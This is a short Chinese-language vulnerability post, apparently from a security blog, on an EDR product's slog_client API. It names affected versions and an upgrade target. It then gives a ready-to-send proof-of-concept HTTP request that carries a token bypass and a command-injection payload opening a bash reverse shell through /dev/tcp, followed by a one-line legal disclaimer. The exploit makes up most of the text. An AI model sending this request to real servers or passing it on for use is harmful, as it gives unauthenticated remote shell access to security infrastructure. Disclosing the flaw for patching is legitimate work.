影响范围
受影响版本为3.2.17R1, 3.2.21两个版本,如果为这两个版本建议升级版本至 3.2.21.375
漏洞详情
POC
POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 HTTP/1.1
Host: xx.x.x.x
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.22.0
Content-Length: 77
{"params": "w=123\"'1234123'\"|bash -i >& /dev/tcp/ip/port 0>&1"}
温馨提示:一切未经授权的渗透测试行为均为违法行为。 © 版权声明
分享是一种美德,转载请保留原链接。
THE END